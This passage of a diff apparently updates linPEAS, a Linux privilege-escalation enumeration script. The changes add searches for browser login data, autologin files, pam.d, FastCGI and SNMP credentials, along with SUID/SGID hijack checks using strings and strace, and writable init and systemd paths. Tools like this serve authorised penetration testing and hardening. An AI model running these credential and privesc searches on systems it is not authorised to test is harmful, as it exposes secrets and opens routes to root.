$B"[i] "$Y"https://book.hacktricks.xyz/forensics/basic-forensics-esp/browser-artifacts#firefox\n"$NC + chromedirs=$(echo "$FIND_DIR_HOME" | grep -E 'google-chrome') + printf "$chromedirs\n" | while read f; do + if [ "$f" ]; then + echo "Found $f" + find "$f" -name "History" -o -name "Cookies" -o -name "Cache" -o -name "Bookmarks" -o -name "Web Data" -o -name "Favicons" -o -name "Login Data" -o -name "Current Session" -o -name "Current Tabs" -o -name "Last Session" -o -name "Last Tabs" -o -name "Extensions" -o -name "Thumbnails" 2>/dev/null | sort + fi + done + echo "" + + #-- SI) Autologin files + printf $Y"[+] "$GREEN"Autologin Files\n"$NC + autologinfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_MNT" | grep -E 'autologin|autologin.conf') + printf "$autologinfiles\n" | while read f; do + echo "$f" + ls -l "$f" 2>/dev/null | sed "s,passwd,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed "s,passwd,${C}[1;31m&${C}[0m," + echo "" + done + echo "" + + #-- SI) S/Key athentication + printf $Y"[+] "$GREEN"S/Key authentication\n"$NC + if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep skey`" ]; then + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null + fi + fi + echo "" + + #-- SI) YubiKey athentication + printf $Y"[+] "$GREEN"YubiKey authentication\n"$NC + if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep yubikey`" ]; then + printf "System supports$RED YubiKey$NC authentication\n" + if [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null + fi + fi + echo "" + + #-- SI) Passwords inside pam.d + printf $Y"[+] "$GREEN"Passwords inside pam.d\n"$NC + grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${C}[1;31m&${C}[0m," + echo "" + + #-- SI) FastCGI params + printf $Y"[+] "$GREEN"FastCGI Params\n"$NC + fastcgi_paramsfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'fastcgi_params') + printf "$fastcgi_paramsfiles\n" | while read f; do + ls -l "$f" 2>/dev/null + cat "$f" 2>/dev/null | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${C}[1;31m&${C}[0m," + echo "" + done + echo "" + + #-- SI) SNMP params + printf $Y"[+] "$GREEN"SNMPs\n"$NC + snmpdfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'snmpd.conf') + printf "$snmpdfiles\n" | while read f; do + ls -l "$f" 2>/dev/null + cat "$f" 2>/dev/null | grep -E "rocommunity|rwcommunity" | sed -${E} "s,rocommunity|rwcommunity,${C}[1;31m&${C}[0m," + echo "" + done + echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi @@ -2205,70 +2609,142 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ########################################### #----------) Interesting files (----------# ########################################### - printf $B"====================================( "$GREEN"Interesting Files"$B" )=====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"Interesting Files"$B" ╠════════════════════════════════════\n"$NC ##-- IF) SUID printf $Y"[+] "$GREEN"SUID - Check easy privesc, exploits and write perms\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC - find / -perm -4000 2>/dev/null | while read s; do - if [ -O "$s" ]; then - echo "You own the SUID file: $s" | sed -E "s,.*,${C}[1;31m&${C}[0m," - elif [ -w "$s" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + if ! [ "$STRINGS" ]; then + echo_not_found "strings" + fi + if ! [ "$STRACE" ]; then + echo_not_found "strace" + fi + find / -perm -4000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do + sname="`echo \"$s\" | awk '{print $9}'`" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + elif [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," else c="a" for b in $sidB; do if [ "`echo $s | grep $(echo $b | cut -d % -f 1)`" ]; then - echo "$s" | sed -E "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," c="" break; fi done; if [ "$c" ]; then - echo "$s" | sed -E "s,$sidG1,${C}[1;32m&${C}[0m," | sed -E "s,$sidG2,${C}[1;32m&${C}[0m," | sed -E "s,$sidVB,${C}[1;31;103m&${C}[0m," + if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ]; then + echo "$s" | sed -${E} "s,$sidG1,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG2,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidVB,${C}[1;31;103m&${C}[0m," + else + echo "$s" | sed -${E} "s,/.*,${C}[1m&${C}[0m," + printf $ITALIC + if [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="`echo \"$sline\" | cut -d ' ' -f1`" + if [ "`echo \"$sline_first\" | grep -Ev \"$cfuncs\"`" ]; then + if [ "`echo \"$sline_first\" | grep \"/\"`" ] && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && [ "`command -v \"$sline_first\" 2>/dev/null | grep '/' `" ] && [ "`echo \"$sline_first\" | grep -v \"..\" `" ]; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi + fi + done + if [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${C}[1;31m&${C}[0m$ITALIC,g" + printf $NC + echo "----------------------------------------------------------------------------------------" + echo "" + fi + fi + fi fi fi done; echo "" + ##-- IF) SGID printf $Y"[+] "$GREEN"SGID\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC - find / -perm -g=s -type f 2>/dev/null | while read s; do - if [ -O "$s" ]; then - echo "You own the SGID file: $s" | sed -E "s,.*,${C}[1;31m&${C}[0m," - elif [ -w $s ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + find / -perm -2000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do + sname="`echo \"$s\" | awk '{print $9}'`" + sname="`echo \"$s\" | awk '{print $9}'`" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + elif [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," else c="a" for b in $sidB; do - if [ "`echo $s | grep $(echo $b | cut -d % -f 1)`" ]; then - echo "$s" | sed -E "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + if [ "`echo \"$s\" | grep $(echo \"$b\" | cut -d % -f 1)`" ]; then + echo "$s" | sed -${E} "s,$(echo \"$b\" | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," c="" break; fi done; if [ "$c" ]; then - echo "$s" | sed -E "s,$sidG1,${C}[1;32m&${C}[0m," | sed -E "s,$sidG2,${C}[1;32m&${C}[0m," | sed -E "s,$sidVB,${C}[1;31;103m&${C}[0m," + if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ]; then + echo "$s" | sed -${E} "s,$sidG1,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG2,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidVB,${C}[1;31;103m&${C}[0m," + else + echo "$s" | sed -${E} "s,/.*,${C}[1m&${C}[0m," + printf $ITALIC + if [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="`echo \"$sline\" | cut -d ' ' -f1`" + if [ "`echo \"$sline_first\" | grep -Ev \"$cfuncs\"`" ]; then + if [ "`echo \"$sline_first\" | grep \"/\"`" ] && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && [ "`command -v \"$sline_first\" 2>/dev/null | grep '/' `" ]; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf $ITALIC + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${C}[1;31m&${C}[0m$ITALIC,g" + printf $NC + echo "" + fi + fi + fi fi fi done; echo "" ##-- IF) Misconfigured ld.so - printf $Y"[+] "$GREEN"Cheking missconfigurations of ld.so\n"$NC + printf $Y"[+] "$GREEN"Checking misconfigurations of ld.so\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so\n"$NC printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" cat /etc/ld.so.conf 2>/dev/null | while read l; do if [ "`echo \"$l\" | grep include`" ]; then ini_path="`echo \"$l\" | cut -d " " -f 2`" fpath="`dirname \"$ini_path\"`" - if [ "`find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f -writable -or -user $USER 2>/dev/null`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - printf $ITALIC"$fpath\n"$NC | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + if [ "`find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" - cat "$f" | grep -v "^#" | sed -E "s,$ldsoconfdG,${C}[1;32m&${C}[0m," | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${C}[1;32m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" done fi done @@ -2278,16 +2754,18 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Capabilities\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities\n"$NC echo "Current capabilities:" - (cat "/proc/$$/status" 2> /dev/null | grep Cap | sed -E "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") || echo_not_found "/proc/$$/status" + (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${C}[1;31;103m&${C}[0m," ) || echo_not_found "capsh" + (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") 2>/dev/null || echo_not_found "/proc/$$/status" echo "" echo "Shell capabilities:" - (cat "/proc/$PPID/status" 2> /dev/null | grep Cap | sed -E "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") || echo_not_found "/proc/$PPID/status" + (capsh --decode=0x"`cat \"/proc/$PPID/status\" 2>/dev/null | grep \"CapEff\" | awk '{print $2}'`" 2>/dev/null) || echo_not_found "capsh" + (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") 2>/dev/null || echo_not_found "/proc/$PPID/status" echo "" echo "Files with capabilities:" getcap -r / 2>/dev/null | while read cb; do - echo "$cb" | sed -E "s,$sudocapsB,${C}[1;31m&${C}[0m," | sed -E "s,$capsB,${C}[1;31m&${C}[0m," + echo "$cb" | sed -${E} "s,$sudocapsB,${C}[1;31m&${C}[0m," | sed -${E} "s,$capsB,${C}[1;31m&${C}[0m," if [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then - echo "$cb is writable" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "$cb is writable" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," fi done echo "" @@ -2296,7 +2774,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Users with capabilities\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities\n"$NC if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," else echo_not_found "/etc/security/capability.conf" fi echo "" @@ -2304,21 +2782,31 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Files with ACLs printf $Y"[+] "$GREEN"Files with ACLs\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls\n"$NC - ((getfacl -t -s -R -p /bin /etc /home /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," + ((getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," echo "" ##-- IF) .sh files in PATH printf $Y"[+] "$GREEN".sh files in path\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path\n"$NC - echo $PATH | tr ":" "\n" | while read d; do find "$d" -name "*.sh" 2>/dev/null | sed -E "s,$pathshG,${C}[1;32m&${C}[0m," ; done + echo $PATH | tr ":" "\n" | while read d; do + for f in `find "$d" -name "*.sh" 2>/dev/null`; do + if [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + elif [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + else + echo $f | sed -${E} "s,$shscripsG,${C}[1;32m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,"; + fi + done + done echo "" ##-- IF) Unexpected folders in / - printf $Y"[+] "$GREEN"Unexpected folders in root\n"$NC + printf $Y"[+] "$GREEN"Unexpected in root\n"$NC if [ "$MACPEAS" ]; then - (find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsMacG" | sed -E "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found else - (find / -maxdepth 1 -type d | grep -Ev "$commonrootdirsG" | sed -E "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found fi echo "" @@ -2326,10 +2814,10 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Files (scripts) in /etc/profile.d/\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files\n"$NC if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ | sed -E "s,$profiledG,${C}[1;32m&${C}[0m,") || echo_not_found "/etc/profile.d/" - if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/profile.d/ -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/profile.d/ -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${C}[1;32m&${C}[0m,") || echo_not_found "/etc/profile.d/" + if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi fi echo "" @@ -2337,59 +2825,59 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $Y"[+] "$GREEN"Permissions in init, init.d, systemd, and rc.d\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d\n"$NC if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/init/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/init.d/ -type f -writable -or -user $USER`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/rc.d/init.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /usr/local/etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/rc.d -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /lib/systemd/ -type f -writable -or -user $USER 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f -writable -or -user $USER`" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + if [ "`find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi fi echo "" ##-- IF) Hashes in passwd file printf $Y"[+] "$GREEN"Hashes inside passwd file? ........... "$NC - if [ "`grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`grep -v '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi ##-- IF) Writable in passwd file printf $Y"[+] "$GREEN"Writable passwd file? ................ "$NC - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," else echo_no fi ##-- IF) Credentials in fstab printf $Y"[+] "$GREEN"Credentials in fstab/mtab? ........... "$NC - if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`grep -E 